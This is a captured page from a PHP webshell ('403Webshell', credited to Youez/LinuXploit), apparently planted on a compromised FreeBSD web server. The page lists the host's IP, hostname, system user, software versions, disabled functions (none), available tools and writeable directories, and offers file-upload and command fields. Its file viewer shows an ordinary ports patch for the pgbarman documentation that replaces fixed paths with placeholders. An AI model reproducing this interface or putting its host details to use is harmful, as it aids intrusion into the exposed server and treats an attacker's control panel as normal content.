403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/databases/pgbarman/files/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/databases/pgbarman/files/patch-doc_barman.5
--- doc/barman.5.orig	2021-12-01 11:09:36 UTC
+++ doc/barman.5
@@ -17,7 +17,7 @@ The system\-level Barman configuration file is located
 .IP
 .nf
 \f[C]
-/etc/barman.conf
+%%PREFIX%%/etc/barman.conf
 \f[]
 .fi
 .PP
@@ -25,7 +25,7 @@ or
 .IP
 .nf
 \f[C]
-/etc/barman/barman.conf
+%%PREFIX%%/etc/barman/barman.conf
 \f[]
 .fi
 .PP
@@ -51,9 +51,9 @@ configurations.
 If the value of \f[C]configuration_files_directory\f[] is a directory,
 Barman reads all files with \f[C]\&.conf\f[] extension that exist in
 that folder.
-For example, if you set it to \f[C]/etc/barman.d\f[], you can specify
+For example, if you set it to \f[C]%%PREFIX%%/etc/barman.d\f[], you can specify
 your PostgreSQL servers placing each section in a separate
-\f[C]\&.conf\f[] file inside the \f[C]/etc/barman.d\f[] folder.
+\f[C]\&.conf\f[] file inside the \f[C]%%PREFIX%%/etc/barman.d\f[] folder.
 .SH OPTIONS
 .TP
 .B active
@@ -851,7 +851,7 @@ Here is an example of configuration file:
 \f[C]
 [barman]
 ;\ Main\ directory
-barman_home\ =\ /var/lib/barman
+barman_home\ =\ /var/barman
 
 ;\ System\ user
 barman_user\ =\ barman
@@ -871,13 +871,13 @@ reuse_backup\ =\ link
 description\ =\ \ "Main\ PostgreSQL\ Database"
 
 ;\ SSH\ options
-ssh_command\ =\ ssh\ postgres\@pg
+ssh_command\ =\ ssh\ %%PGUSER%%\@pg
 
 ;\ PostgreSQL\ connection\ string
-conninfo\ =\ host=pg\ user=postgres
+conninfo\ =\ host=pg\ user=%%PGUSER%%
 
 ;\ PostgreSQL\ streaming\ connection\ string
-streaming_conninfo\ =\ host=pg\ user=postgres
+streaming_conninfo\ =\ host=pg\ user=%%PGUSER%%
 
 ;\ Minimum\ number\ of\ required\ backups\ (redundancy)
 minimum_redundancy\ =\ 1

Youez - 2016 - github.com/yon3zu
LinuXploit